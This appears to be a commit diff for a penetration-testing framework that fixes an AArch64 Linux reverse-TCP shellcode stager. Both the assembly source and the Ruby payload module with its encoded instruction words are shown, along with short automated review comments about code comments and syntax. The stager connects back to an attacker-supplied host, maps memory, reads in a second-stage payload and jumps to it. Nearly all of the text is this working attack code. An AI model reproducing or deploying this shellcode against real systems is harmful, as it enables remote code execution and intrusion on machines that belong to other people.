
Commit 6dbe001

committed
fix stager
1 parent 202c936 commit 6dbe001


2 files changed

+26
-17
lines changed


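--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -37,9 +37,10 @@ start:
 mov x2, #4
 mov x8, SYS_READ
 svc 0
-cbz w0, failed
+cmn x0, #0x1
+beq failed
 
-ldr x2, [sp,#0]
+ldr w2, [sp,#0]
 
 /* Page-align, assume <4GB */
 lsr x2, x2, #12
@@ -53,12 +54,13 @@ start:
 mov x3, #34
 mov x4, xzr
 mov x5, xzr
-/* call mmap() */
-movi x8, SYS_MMAP
+mov x8, SYS_MMAP
 svc 0
+cmn x0, #0x1
+beq failed
 
 /* Grab the saved size, save the address */
-ldr x4, [sp]
+ldr w4, [sp]
 
 /* Save the memory address */
 str x0, [sp]
@@ -73,13 +75,15 @@ read_loop:
 mov x2, x4
 mov x8, SYS_READ
 svc 0
+cmn x0, #0x1
+beq failed
 add x3, x3, x0
 subs x4, x4, x0
 bne read_loop
 
 /* Go to shellcode */
-ldr x30, [sp]
-ret
+ldr x0, [sp]
+blr x0
 
 failed:
 mov x0, 0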
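Review bot: The `/* call mmap() */` comment is deleted together with the `movi` to `mov` correction in the second hunk, so the mmap setup loses its explanatory comment while the neighbouring blocks keep theirs (`/* Grab the saved size, save the address */`, `/* Go to shellcode */`); keep the line `/* call mmap() */` directly above `mov x8, SYS_MMAP`. Separately, `mov x0, 0` under `failed:` is the one immediate in these hunks written without the `#` marker that `mov x2, #4`, `mov x3, #34` and the new `cmn x0, #0x1` use; `mov x0, #0` keeps the file's immediate syntax consistent. The `start:` block begins before the first hunk and the `failed:` path continues past the last one.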

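--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -33,8 +33,8 @@ def initialize(info = {})
 {
 'Offsets' =>
 {
-'LPORT' => [ 186, 'n' ],
-'LHOST' => [ 188, 'ADDR' ],
+'LPORT' => [ 206, 'n' ],
+'LHOST' => [ 208, 'ADDR' ],
 },
 'Payload' =>
 [
@@ -45,19 +45,20 @@ def initialize(info = {})
 0xd28018c8, # mov x8, #0xc6 // #198
 0xd4000001, # svc #0x0
 0xaa0003ec, # mov x12, x0
-0x10000501, # adr x1, b8 <sockaddr>
+0x100005a1, # adr x1, cc <sockaddr>
 0xd2800202, # mov x2, #0x10 // #16
 0xd2801968, # mov x8, #0xcb // #203
 0xd4000001, # svc #0x0
-0x35000420, # cbnz w0, ac <failed>
+0x350004c0, # cbnz w0, c0 <failed>
 0xaa0c03e0, # mov x0, x12
 0xd10043ff, # sub sp, sp, #0x10
 0x910003e1, # mov x1, sp
 0xd2800082, # mov x2, #0x4 // #4
 0xd28007e8, # mov x8, #0x3f // #63
 0xd4000001, # svc #0x0
-0x34000340, # cbz w0, ac <failed>
-0xf94003e2, # ldr x2, [sp]
+0xb100041f, # cmn x0, #0x1
+0x540003c0, # b.eq c0 <failed>
+0xb94003e2, # ldr w2, [sp]
 0xd34cfc42, # lsr x2, x2, #12
 0x91000442, # add x2, x2, #0x1
 0xd374cc42, # lsl x2, x2, #12
@@ -69,19 +70,23 @@ def initialize(info = {})
 0xaa1f03e5, # mov x5, xzr
 0xd2801bc8, # mov x8, #0xde // #222
 0xd4000001, # svc #0x0
-0xf94003e4, # ldr x4, [sp]
+0xb100041f, # cmn x0, #0x1
+0x54000200, # b.eq c0 <failed>
+0xb94003e4, # ldr w4, [sp]
 0xf90003e0, # str x0, [sp]
 0xaa0003e3, # mov x3, x0
 0xaa0c03e0, # mov x0, x12
 0xaa0303e1, # mov x1, x3
 0xaa0403e2, # mov x2, x4
 0xd28007e8, # mov x8, #0x3f // #63
 0xd4000001, # svc #0x0
+0xb100041f, # cmn x0, #0x1
+0x540000c0, # b.eq c0 <failed>
 0x8b000063, # add x3, x3, x0
 0xeb000084, # subs x4, x4, x0
-0x54ffff21, # b.ne 84 <read_loop>
-0xf94003fe, # ldr x30, [sp]
-0xd65f03c0, # ret
+0x54fffee1, # b.ne 90 <read_loop>
+0xf94003e0, # ldr x0, [sp]
+0xd63f0000, # blr x0
 0xd2800000, # mov x0, #0x0 // #0
 0xd2800ba8, # mov x8, #0x5d // #93
 0xd4000001, # svc #0x0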
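Review bot: The `Offsets` table and the `Payload` words appear to be transcribed from assembler output, yet nothing in the file ties them to their source, and this commit moves `LPORT`/`LHOST` from 186/188 to 206/208 without any comment explaining that the offsets shift whenever instructions are inserted in the stager. Add above `'Offsets' =>` a comment such as `# Transcribed from external/source/shellcode/linux/aarch64/stager_sock_reverse.s; re-assemble and update these offsets together with the Payload words.` The disassembly comments on the new words (`# b.eq c0 <failed>`, `# b.ne 90 <read_loop>`) carry absolute listing addresses that are only meaningful against that assembly, which such a comment would also anchor. `initialize` starts before the first hunk and ends after the last.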
